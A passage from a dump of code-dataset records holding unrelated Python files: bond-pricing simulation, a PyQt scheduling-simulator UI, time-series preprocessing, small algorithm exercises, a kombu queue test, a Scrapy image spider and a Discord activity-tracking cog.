FC.Decision()\n PL=Plot()\n PL.DrawDiscountPath(FC.full_disc(0.0,Get_dr_prob(LI,Setting)))\n\ndef SolutionForLiquidityFactor(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr) \n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n FC.Decision()\n PL=Plot()\n est_lq_sprd=FC.EstimatedLiquidity(Get_dr_prob(LI,Setting))\n PL.DrawDiscountPath(FC.full_disc(est_lq_sprd,Get_dr_prob(LI,Setting)))\n\n\n# #### Settings - 1\nnum_paths = 2000\nyr_length = 30\ndays_per_yr = 360\ntimesteps = days_per_yr * yr_length\ndt = 1 / days_per_yr # Time Step \n\n### LGD=50% \nLGD = 0.5\n\nFace_Val = 1000\nRedempt_Price = 1000 \ncoupon = [ 0, Face_Val*0.0345, Face_Val*0.0445] \n\n# Default LAMBDA\nreco_rate = 0.5 # Recovery Rate\n\n## Initial Setting for Rate Simulation\nInit_Rate = 0.026 # 基準利率\nrv_spd = 0.05\nvol = 0.025\n\n\nSetting={'num_paths':num_paths, 'timesteps':timesteps, 'Face_Val':Face_Val, 'days_per_yr':days_per_yr, \n'dt':dt, 'reco_rate':reco_rate, 'Redempt_Price':Redempt_Price, 
'coupon':coupon,'LGD':LGD}\n\n\n\n\n#print(LoadData('20170623').COC_twAA)\n#print(LoadData('20170622').COC_twAA)\n#print(LoadData('20170623').YC_tw)\n#print(LoadData('20170622').YC_tw)\n\nDownLoadData('20170623')\nLD=LoadData('20170623')\n\n\nCubicSplineInterpolation_YC_tw(LD,Setting)\nTableofCreditSpread(LD,Setting)\nMSEminimization_LambdaEstimation(LD,Setting)\nYCDF(LD)\nThetaApproximation(LD,Setting)\nHullWhiteShortRateSimulation(LD,Setting)\nImplementingLSM(LD,Setting)\nSolutionForLiquidityFactor(LD,Setting)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"IDE_Ver/PCBond-Pricing.py","file_name":"PCBond-Pricing.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
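`Get_dr_prob` above converts the fitted hazard rate into a per-step default probability via 1 - exp(-λ·dt). A worked check with made-up numbers; only dt matches the settings in the record:

import numpy as np

est_lambda = 0.02                     # hypothetical annual default intensity
dt = 1 / 360                          # daily step, as in the settings above
print(1 - np.exp(-est_lambda * dt))   # ~5.6e-05 default probability per day
print(1 - np.exp(-est_lambda))        # ~0.0198 over a full year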
+{"seq_id":"653992853","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom testsimulatorWindow import*\n\n\n\nclass Ui_MainWindow(object):\n\n def __init__(self):\n super().__init__()\n self.n = 0 # n for number of processes\n self.option = 0 # option for selection of algo\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(800, 600)\n MainWindow.setAutoFillBackground(False)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.backgroundImage = QtWidgets.QLabel(self.centralwidget)\n self.backgroundImage.setGeometry(QtCore.QRect(0, 0, 801, 581))\n self.backgroundImage.setText(\"\")\n self.backgroundImage.setPixmap(QtGui.QPixmap(\"main_background.jpg\"))\n self.backgroundImage.setScaledContents(True)\n self.backgroundImage.setObjectName(\"backgroundImage\")\n\n #for label1\n\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(290, 40, 471, 101))\n font = QtGui.QFont()\n font.setFamily(\"Rockwell Extra Bold\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"color : #fff;\\n\"\n\"font-size : 42px;\\n\"\n\"}\")\n self.label.setObjectName(\"label\")\n\n #for label2\n\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(450, 120, 411, 41))\n font = QtGui.QFont()\n font.setFamily(\"Rockwell Extra Bold\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n self.label_2.setFont(font)\n self.label_2.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"\\n\"\n\"font-size : 24px;\\n\"\n\"color : rgb(255, 85, 6);\\n\"\n\"}\")\n self.label_2.setObjectName(\"label_2\")\n\n #frame \n \n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(350, 220, 411, 221))\n self.frame.setStyleSheet(\"QFrame\\n\"\n\"{\\n\"\n\"\\n\"\n\"border: 4px dashed #fff;\\n\"\n\"\\n\"\n\"}\")\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n\n #label3\n\n self.label_3 = QtWidgets.QLabel(self.frame)\n self.label_3.setGeometry(QtCore.QRect(20, 50, 171, 51))\n self.label_3.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"border : none;\\n\"\n\"color : #fff;\\n\"\n\"font-size : 22px;\\n\"\n\"}\")\n self.label_3.setObjectName(\"label_3\")\n \n #label3\n\n self.label_4 = QtWidgets.QLabel(self.frame)\n self.label_4.setGeometry(QtCore.QRect(20, 120, 161, 41))\n self.label_4.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"border : none;\\n\"\n\"color : #fff;\\n\"\n\"font-size : 22px;\\n\"\n\"}\")\n self.label_4.setObjectName(\"label_4\")\n \n #comboBox\n\n self.comboBox = QtWidgets.QComboBox(self.frame)\n self.comboBox.setGeometry(QtCore.QRect(220, 120, 161, 41))\n self.comboBox.setStyleSheet(\"QComboBox\\n\"\n\"{\\n\"\n\"background-color : #fff;\\n\"\n\"font-size : 18px;\\n\"\n\"}\")\n self.comboBox.setObjectName(\"comboBox\")\n icon = QtGui.QIcon.fromTheme(\"none\")\n self.comboBox.addItem(icon, \"\")\n self.comboBox.setItemText(0, \"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n\n #lineEdit\n\n self.lineEdit = QtWidgets.QLineEdit(self.frame)\n font = QtGui.QFont()\n font.setFamily(\"Source Sans Pro Black\")\n font.setPointSize(12)\n font.setBold(True)\n font.setItalic(False)\n 
font.setWeight(75)\n        self.lineEdit.setFont(font)\n        self.lineEdit.setStyleSheet(\"QLineEdit\\n\"\n\"{\\n\"\n\"padding : 1px 2px 2px 2px;\\n\"\n\"}\")\n        self.lineEdit.setGeometry(QtCore.QRect(220, 60, 161, 41))\n        self.lineEdit.setObjectName(\"lineEdit\")\n\n        self.start = QtWidgets.QPushButton(self.centralwidget)\n        self.start.setGeometry(QtCore.QRect(500, 460, 131, 51))\n        font = QtGui.QFont()\n        font.setFamily(\"Nueva Std\")\n        font.setPointSize(-1)\n        font.setBold(True)\n        font.setWeight(75)\n        self.start.setFont(font)\n        self.start.setStyleSheet(\"QPushButton\\n\"\n\"{\\n\"\n\"    background-color: rgb(255, 16, 80);\\n\"\n\"    border-radius : 2px;\\n\"\n\"    color: white;\\n\"\n\"    padding: 15px 28px;\\n\"\n\"    text-align: center;\\n\"\n\"    font-size: 24px;\\n\"\n\"}\\n\"\n\"\")\n        self.onlyInt = QtGui.QIntValidator(1,10)\n        self.lineEdit.setValidator(self.onlyInt)  # validation for the number of processes\n\n        self.start.setObjectName(\"start\")\n        MainWindow.setCentralWidget(self.centralwidget)\n        self.statusbar = QtWidgets.QStatusBar(MainWindow)\n        self.statusbar.setObjectName(\"statusbar\")\n        MainWindow.setStatusBar(self.statusbar)\n\n        self.retranslateUi(MainWindow)\n        QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n        self.start.clicked.connect(self.onStart)  # validate the input, then select the algorithm and launch\n\n    def retranslateUi(self, MainWindow):\n        _translate = QtCore.QCoreApplication.translate\n        MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Simulator\"))\n        self.label.setText(_translate(\"MainWindow\", \"CPU - SCHEDULING\"))\n        self.label_2.setText(_translate(\"MainWindow\", \"SIMULATION PROGRAM\"))\n        self.label_3.setText(_translate(\"MainWindow\", \"No of Process : \"))\n        self.label_4.setText(_translate(\"MainWindow\", \"Algorithm :\"))\n        self.comboBox.setStatusTip(_translate(\"MainWindow\", \" Select the Scheduling Algorithm\"))\n        self.comboBox.setItemText(1, _translate(\"MainWindow\", \"FCFS\"))\n        self.comboBox.setItemText(2, _translate(\"MainWindow\", \"RR\"))\n        self.comboBox.setItemText(3, _translate(\"MainWindow\", \"Priority-np\"))\n        self.comboBox.setItemText(4, _translate(\"MainWindow\", \"Priority-p\"))\n        self.comboBox.setItemText(5, _translate(\"MainWindow\", \"SJF\"))\n        self.comboBox.setItemText(6, _translate(\"MainWindow\", \"SRTF\"))\n        self.start.setText(_translate(\"MainWindow\", \"Start\"))\n\n    def onStart(self):\n        # proceed to the algorithm selection only if the process count is valid\n        if self.getNum():\n            self.getAlgo()\n\n    def getNum(self):\n        if self.lineEdit.text() == \"\":\n            error = \"input no of process !\"\n            self.showError(error)\n            return False\n        else :\n            self.n = int(self.lineEdit.text())\n            return True\n\n    def getAlgo(self):\n        if self.comboBox.currentText() == \"\":\n            error = \"Select the Algorithm !\"\n            self.showError(error)\n        else :\n            txt = self.comboBox.currentText()\n            if txt == \"FCFS\": self.option = 0\n            if txt == \"RR\": self.option = 1\n            if txt == \"Priority-np\": self.option = 2\n            if txt == \"Priority-p\": self.option = 3\n            if txt == \"SJF\": self.option = 4\n            if txt == \"SRTF\": self.option = 5\n            self.openSimulator()\n\n    def showError(self,error):\n        msg = QtWidgets.QMessageBox()\n        msg.setWindowTitle(\"Error\")\n        msg.setText(error)\n        font = QtGui.QFont()\n        font.setFamily(\"Nueva Std\")\n        font.setPointSize(-1)\n        font.setBold(True)\n        font.setWeight(75)\n        msg.setFont(font)\n        msg.setIcon(QtWidgets.QMessageBox.Critical)\n        msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)\n        msg.setStyleSheet('QLabel{margin : 10px;}\\n QLabel {font-size: 22px;}')\n        msg.exec_()\n\n\n\n    def openSimulator(self):  # open the second window\n        self.window = 
QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow1()\n self.ui.n = self.n # setting the n and option variables of simulator window\n self.ui.option = self.option\n self.ui.setupUi(self.window)\n self.window.show()\n \n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"testmainWindow.py","file_name":"testmainWindow.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"390604957","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\n\n\ndef generate_graph_seq2seq_io_data(\n df, x_offsets, y_offsets, daily_trend,add_time_in_day=True,\n):\n \"\"\"\n Generate samples from\n :param df:\n :param x_offsets:\n :param y_offsets:\n :param add_time_in_day:\n :param add_day_in_week:\n :param scaler:\n :return:\n # x: (epoch_size, input_length, num_nodes, input_dim)\n # y: (epoch_size, output_length, num_nodes, output_dim)\n \"\"\"\n\n num_samples, num_nodes = df.shape #(num_samples, num_nodes)\n time_ind = [i % trend_size for i in range(len(df))]\n time_ind = np.array(time_ind)\n print('daily_trend shape',daily_trend.shape)\n data = np.expand_dims(df, axis=-1)\n data_list = [data]\n if add_time_in_day:\n time_in_day = np.tile(time_ind, [1, num_nodes, 1]).transpose((2, 1, 0))\n data_list.append(time_in_day)\n\n\n data = np.concatenate(data_list, axis=-1)\n # epoch_len = num_samples + min(x_offsets) - max(y_offsets)\n x, y ,y_trend = [], [], []\n # t is the index of the last observation.\n min_t = abs(min(x_offsets))\n max_t = abs(num_samples - abs(max(y_offsets))) # Exclusive\n for t in range(min_t, max_t):\n x_t = data[t + x_offsets, ...]\n y_t = data[t + y_offsets, ...]\n y_trend_t = daily_trend[time_ind[t + y_offsets],...]\n x.append(x_t)\n y.append(y_t)\n y_trend.append(y_trend_t)\n x = np.stack(x, axis=0)\n y = np.stack(y, axis=0)\n y_trend = np.stack(y_trend, axis=0)\n return x, y, y_trend\n\ndef calculate_daily_trend(df,train_percent,trend_size):\n df = df[0:round(len(df)*train_percent),:] #只使用训练集的数据计算trend\n time_ind = [i % trend_size for i in range(len(df))]\n time_ind = np.array(time_ind)\n # print('time_ind',time_ind)\n\n trend_list = []\n for ind in range(trend_size):\n mean_timeind = np.array(df[np.where(time_ind == ind)].mean(axis=0))\n trend_list.append(mean_timeind)\n\n daily_trend = np.stack(trend_list,axis=0)\n\n return daily_trend\n\n\ndef generate_train_val_test(args,input_len,output_len,trend_size):\n\n\n df = np.loadtxt(args.filename, delimiter=',')\n\n if 'electricity' in args.filename or 'solar' in args.filename:\n print('data_rescaled')\n max_data = df.max(axis=0)\n min_data = df.min(axis=0)\n df = (df-min_data)/(max_data-min_data)\n\n train_percent = 0.6\n test_percent = 0.2\n\n # 0 is the latest observed sample.\n x_offsets = np.sort(\n np.concatenate((np.arange(-input_len+1, 1, 1),))\n )\n # Predict the next one hour\n y_offsets = np.sort(np.arange(1, output_len+1, 1))\n\n #calculate the daily_trends\n daily_trend = calculate_daily_trend(df,train_percent,trend_size)\n\n # x: (num_samples, input_length, num_nodes, input_dim)\n # y: (num_samples, output_length, num_nodes, output_dim)\n x, y, y_trend = generate_graph_seq2seq_io_data(\n df,\n x_offsets=x_offsets,\n y_offsets=y_offsets,\n daily_trend = daily_trend,\n add_time_in_day=True,\n )\n\n print(\"x shape: \", x.shape, \", y shape: \", y.shape, \", y_trend shape\", y_trend.shape)\n\n num_samples = x.shape[0]\n num_test = round(num_samples * test_percent)\n num_train = round(num_samples * train_percent)\n num_val = num_samples - num_test - num_train\n\n # train\n x_train, y_train, ytrend_train = x[:num_train], y[:num_train], y_trend[:num_train]\n # val\n x_val, y_val, ytrend_val = (\n x[num_train: num_train + num_val],\n y[num_train: num_train + num_val],\n y_trend[num_train: num_train + num_val],\n 
)\n # test\n x_test, y_test, ytrend_test = x[-num_test:], y[-num_test:], y_trend[-num_test:]\n\n for cat in [\"train\", \"val\", \"test\"]:\n _x, _y, _ytrend = locals()[\"x_\" + cat], locals()[\"y_\" + cat], locals()[\"ytrend_\" + cat]\n print(cat, \"x: \", _x.shape, \"y:\", _y.shape, \"ytrend:\", _ytrend.shape)\n np.savez_compressed(\n os.path.join(args.output_dir, \"%s.npz\" % cat),\n x=_x,\n y=_y,\n ytrend=_ytrend,\n x_offsets=x_offsets.reshape(list(x_offsets.shape) + [1]),\n y_offsets=y_offsets.reshape(list(y_offsets.shape) + [1]),\n )\n\n return df,daily_trend\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--output_dir\", type=str, default=\"../data/electricity/\", help=\"Output directory.\"\n )\n parser.add_argument(\n \"--filename\",\n type=str,\n default=\"../data/electricity\",\n help=\"Raw data readings.\",\n )\n args = parser.parse_args()\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n input_len = 24\n output_len = 12\n trend_size = 7\n\n print(\"Generating training data\")\n generate_train_val_test(args,input_len,output_len,trend_size)\n","sub_path":"generate_txt_data.py","file_name":"generate_txt_data.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
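The x_offsets/y_offsets arrays above slice a history window and a forecast window around each time index t. A miniature numpy illustration; the window lengths are made up:

import numpy as np

data = np.arange(10)
x_offsets = np.arange(-2, 1)    # t-2, t-1, t   (input_len = 3)
y_offsets = np.arange(1, 3)     # t+1, t+2      (output_len = 2)
for t in range(2, 8):           # min_t = 2, max_t = len(data) - 2
    print(data[t + x_offsets], '->', data[t + y_offsets])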
+{"seq_id":"541085846","text":"__author__ = 'ThomasRiley'\r\n\r\nwith open('input.txt') as f:\r\n testCases = f.readlines()\r\n n = testCases[0]\r\n for i in range(1, int(n)+1):\r\n s = set()\r\n num = (int(testCases[i]))\r\n done = False\r\n x = 1\r\n while not done:\r\n if num == 0:\r\n print('Case #'+str(i)+': INSOMNIA')\r\n done = True\r\n #if str(num) not in s:\r\n # s.add(str(num))\r\n for c in str(num*x):\r\n s.add(c)\r\n\r\n if len(s) == 10:\r\n print('Case #'+str(i)+': '+str(num*x))\r\n done = True\r\n x += 1","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Gnarlywhale_countinsheep.py","file_name":"16_0_1_Gnarlywhale_countinsheep.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"211553655","text":"# 8. Given a string, compute recursively a new string where all the 'x' chars have been removed.\ndef remove(n):\n if len(n) <= 1:\n if n == 'x' :\n return ''\n else:\n return n\n\n else:\n if n[0] == 'x' :\n return '' + remove(n[1:])\n else:\n return n[0] + remove(n[1:])\n\nprint(remove('lxxxxxxoxxxxxl'))\n","sub_path":"week-04/day-04/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"53738056","text":"# -*- coding : utf-8 -*-\r\n\r\n'''\r\nGiven a binary tree, find its maximum depth.\r\n\r\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\r\n'''\r\n\r\n# Definition for a binary tree node.\r\nclass TreeNode(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\nclass Solution(object):\r\n def maxDepth(self, root):\r\n \"\"\"\r\n :type root: TreeNode\r\n :rtype: int\r\n \"\"\"\r\n return 0 if not root else 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))\r\n \r\n # if not root:\r\n # return 0 \r\n # left_num = self.maxDepth(root.left) + 1\r\n # right_num = self.maxDepth(root.right) + 1\r\n # return max(left_num, right_num)\r\n \r\n \r\nif __name__ == '__main__':\r\n root = temp = TreeNode(0)\r\n temp.left = left = TreeNode(0)\r\n temp.right = right = TreeNode(0)\r\n left.left = left = TreeNode(0)\r\n so = Solution()\r\n print(so.maxDepth(root))","sub_path":"104. Maximum-Depth-of Binary-Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"107723481","text":"import unittest\nfrom microservices.utils import set_logging\n\nset_logging()\n\n\nclass TestService(unittest.TestCase):\n def test_service(self):\n from microservices.queues.service import Microservice\n from microservices.queues.client import Client\n from kombu.connection import Connection\n\n microservice = Microservice('memory:///', timeout=1)\n\n connection = Connection('memory:///')\n\n @microservice.queue('test', connection=None)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n @microservice.queue('one_q', connection=connection)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n @microservice.queue('two_q', connection=connection)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n client = Client('memory:///')\n test_q = client.queue('test')\n test_q.publish('data')\n\n queues = [\n ('one_q', 'one'),\n ('two_q', 'two'),\n ]\n client.declare_exchange('input', queues=queues)\n input_e_one = client.exchange('input', 'one')\n input_e_two = client.exchange('input', 'two')\n\n input_e_one.publish('data')\n input_e_two.publish('data')\n\n client.delete_queue('one_q')\n client.delete_exchange('input')\n client.purge_queue('two_q')\n\n microservice.read(count=5)\n","sub_path":"microservices/queues/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237116564","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom ScrapyCrawler.items import Bmw3Item\n\n\nclass Bmw3Spider(CrawlSpider):\n name = 'bmw3'\n allowed_domains = ['car.autohome.com.cn']\n start_urls = ['https://car.autohome.com.cn/pic/series/65.html']\n\n # 为spider爬虫,配置自己的高清图片下载pipeline(ImagesPipeline)\n custom_settings = {\n \"ITEM_PIPELINES\": {\n 'ScrapyCrawler.pipelines.Bmw3Pipeline': 200,\n }\n }\n\n rules = (\n Rule(LinkExtractor(allow=r'https://car.autohome.com.cn/pic/series/65-.+'), callback='parse_page', follow=False),\n )\n\n def parse_page(self, response):\n # 图片的类别\n category = response.xpath('//div[@class=\"uibox\"]/div[@class=\"uibox-title\"]/text()').extract_first()\n # 分类图片地址列表(缩略图)\n src_urls = response.xpath(\n '//div[@class=\"uibox\"]/div[@class=\"uibox-con carpic-list03 border-b-solid\"]//img/@src').extract()\n # print(category,src_urls)\n # 把缩略图地址更换为高清图片地址\n src_urls = list(map(lambda x: x.replace(\"t_\", \"\"), src_urls))\n # 第一种方式: 给高清图片地址加上前缀: https://\n # image_urls = []\n # for src in src_urls:\n # url = response.urljoin(src)\n # image_urls.append(url)\n # 第二种方式: 给高清图片地址加上前缀: https://\n image_urls = list(map(lambda x: response.urljoin(x), src_urls))\n print(category, image_urls)\n # 推送数据到pipeline\n yield Bmw3Item(category=category, image_urls=image_urls)\n\n","sub_path":"04.ScrapyDoc/ScrapyCrawler/ScrapyCrawler/spiders/bmw3.py","file_name":"bmw3.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284824351","text":"import asyncio\nimport datetime\nimport json\nimport logging\nimport math\nimport os\nfrom discord.ext import commands\n\nPATH = \"data/activity/\"\nGLOBAL_NAME = \"activity.json\"\nMONTHLY_NAME = \"activity_monthly.json\"\nGLOBAL_PATH = PATH + GLOBAL_NAME\nMONTHLY_PATH = PATH + MONTHLY_NAME\n\n\nclass ActivityTracker:\n \"\"\"\n Tracks users activity by channel.\n\n It tracks word and messagecount per channel,\n directly associated with their discord ids.\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.people = {}\n self.people_monthly = {}\n self.normies = []\n self.logger = logging.getLogger(__name__)\n self.do_loops = True\n self.save_loop = self.bot.loop.create_task(self.looped_save_json())\n self.load_json()\n\n def __unload(self):\n self.save_json()\n self.save_loop.cancel()\n self.do_loops = False\n\n @commands.group()\n async def activity(self, ctx):\n \"\"\"Group for activity commands\"\"\"\n pass\n\n @activity.command()\n @commands.is_owner()\n async def save(self, ctx):\n \"\"\"Save the current data to the json file\"\"\"\n self.save_json()\n await ctx.send(\"Saved json.\")\n\n @activity.command()\n @commands.is_owner()\n async def reset(self, ctx):\n \"\"\"Reset the db and save the data to a backup file\"\"\"\n name = f\"{PATH}activity_monthly_{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}.json\"\n with open(name, \"w\") as fp:\n json.dump(self.people_monthly, fp, indent=4)\n self.people_monthly = {}\n self.save_json()\n return await ctx.send(f\"Successfully saved backup to `{name}` and reset all stats.\")\n\n @activity.command()\n @commands.is_owner()\n async def delete(self, ctx, discordid):\n \"\"\"\n Delete all saved tracking data about a user\n\n Parameters\n ----------\n discordid: int\n the discordid of the person you want to remove the stats from\n\n Example\n -------\n >>> !activity delete 278888022555230208\n Deletes all tracking data of the user with the discordid 278888022555230208\n \"\"\"\n if discordid in self.people:\n del(self.people[discordid])\n if discordid in self.people_monthly:\n del(self.people_monthly[discordid])\n self.save_json()\n await ctx.send(f\"Successfully deleted {discordid} from the db.\")\n else:\n await ctx.send(\"I don't have data of that user in my db.\")\n\n @activity.command(aliases=[\"lb\", \"sb\", \"scoreboard\"])\n async def leaderboard(self, ctx, globally=False, *blacklist):\n \"\"\"\n Show the top 10 most active people by wordcount\n\n Also display their total words/messages sent during the tracking period\n\n Parameters\n ----------\n globally: bool\n boolean value to determine whether you want to view global data or just\n a limited timeframe.\n accepts boolean-like strings like ('yes', 'no'), ('True', 'False') etc.\n\n blacklist: list\n space separated list of channel IDs of channels that you\n want to filter out from the total calculation\n\n Example\n -------\n >>> !activity leaderboard no 202424129700233217 222148922481573890\n Shows the top 10 people who sent the most words in all channels except\n those with the given IDs since the last stat reset.\n \"\"\"\n if globally:\n global_data = self.people\n else:\n global_data = self.people_monthly\n if not global_data:\n return await ctx.send(\"Nobody has been active during the specified timeframe yet.\")\n sorted_people = list(\n reversed(\n sorted(global_data.items(),\n key=lambda person: sum(person[1][channel][\"words\"] for channel in person[1] if channel not in blacklist))))\n maxlen = 
max(len(str(self.bot.get_user(int(discord_id)))) for discord_id, y in sorted_people)\n l = [(str(self.bot.get_user(int(discord_id))) + (\" \" * (maxlen - len(str(self.bot.get_user(int(discord_id)))))),\n f\"words: {sum(stats[channel]['words'] for channel in stats if channel not in blacklist)}\",\n f\"messages: {sum(stats[channel]['messages'] for channel in stats if channel not in blacklist)}\") for discord_id, stats in sorted_people]\n e = \"\\n\".join(\" \\t\".join(x) for x in l[:10])\n await ctx.send(f\"```{e}```\")\n\n @activity.command()\n async def me(self, ctx, globally=False, *blacklist):\n \"\"\"\n Show stats about your own discord activity\n\n Parameters\n ----------\n globally: bool\n boolean value to determine whether you want to view global data or just\n a limited timeframe.\n accepts boolean-like strings like ('yes', 'no'), ('True', 'False') etc.\n \n blacklist: list\n space separated list of channel IDs of channels that you\n want to filter out from the total calculation\n\n Example\n -------\n >>> !activity me yes 202424129700233217 222148922481573890\n Shows you stats about your all time activity, but filters out the two\n channels with the given IDs\n \"\"\"\n if globally:\n global_data = self.people\n else:\n global_data = self.people_monthly\n if str(ctx.author.id) not in global_data:\n return await ctx.send(\"You have no activity in the specified timeframe.\")\n sorted_stats = list(reversed(sorted(global_data[str(ctx.author.id)].items(),\n key=lambda channel: channel[1]['words'])))\n msg_sum = sum(stats['messages'] for channel, stats in sorted_stats if channel not in blacklist)\n word_sum = sum(stats['words'] for channel, stats in sorted_stats if channel not in blacklist)\n wpm = word_sum / msg_sum\n maxlen = max(len(self.bot.get_channel(int(channel)).name) for channel, stats in sorted_stats if channel not in blacklist)\n l = [(\"#\" + self.bot.get_channel(int(channel)).name + (\" \" * (maxlen - len(self.bot.get_channel(int(channel)).name))),\n f\"words: {str(stats['words'])}\",\n f\"messages: {str(stats['messages'])}\") for channel, stats in sorted_stats if channel not in blacklist]\n e = f\"**Total words:** {word_sum} **Total messages:** {msg_sum} **words/message:** {wpm:.2f}\\n```\" + \"\\n\".join(\" \\t\".join(x) for x in l) + \"```\"\n await ctx.send(e)\n\n async def on_message(self, message):\n ctx = await self.bot.get_context(message)\n if not message.content.startswith(\"!\") and \\\n not ctx.author.bot and \\\n ctx.guild and \\\n ctx.guild.id == 163292084214824960 and \\\n ctx.author.id not in self.normies:\n str_author = str(ctx.author.id)\n channel = str(ctx.channel.id)\n if str_author not in self.people:\n self.people[str_author] = {}\n if channel not in self.people[str_author]:\n self.people[str_author][channel] = {\"words\": 0, \"messages\": 0}\n if str_author not in self.people_monthly:\n self.people_monthly[str_author] = {}\n if channel not in self.people_monthly[str_author]:\n self.people_monthly[str_author][channel] = {\"words\": 0, \"messages\": 0}\n wordcount = len(message.content.strip(\" \").split(\" \"))\n if wordcount >= 15:\n avg_word_length = (len(message.content) - wordcount + 1) / wordcount\n if avg_word_length < 3:\n wordcount = round(math.log(wordcount))\n self.logger.warning(f\"{str(ctx.author)} tried to boost his wordcount danNo\")\n self.people[str_author][channel][\"messages\"] += 1\n self.people[str_author][channel][\"words\"] += wordcount\n self.people_monthly[str_author][channel][\"messages\"] += 1\n 
self.people_monthly[str_author][channel][\"words\"] += wordcount\n\n async def looped_save_json(self):\n while self.do_loops:\n await asyncio.sleep(120)\n self.save_json()\n\n def load_json(self):\n \"\"\"\n Reload the activity dictionary from the json file\n \"\"\"\n if not os.path.isdir(PATH):\n os.makedirs(PATH)\n self.logger.warning(f\"Couldn't find {PATH} directory, created new one.\")\n # global data\n if os.path.isfile(GLOBAL_PATH):\n with open(GLOBAL_PATH, \"r\") as fp:\n self.people = json.load(fp)\n else:\n with open(GLOBAL_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n self.logger.warning(f\"Couldn't find {GLOBAL_PATH}, created new one.\")\n # monthly data\n if os.path.isfile(MONTHLY_PATH):\n with open(MONTHLY_PATH, \"r\") as fp:\n self.people_monthly = json.load(fp)\n else:\n with open(MONTHLY_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n self.logger.warning(f\"Couldn't find {MONTHLY_PATH}, created new one.\")\n\n def save_json(self):\n \"\"\"\n Save the current state of the activity dictionary to the json file\n \"\"\"\n with open(GLOBAL_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n with open(MONTHLY_PATH, \"w\") as fp:\n json.dump(self.people_monthly, fp, indent=4)\n\n\ndef setup(bot):\n bot.add_cog(ActivityTracker(bot))\n","sub_path":"cogs/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":9626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
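
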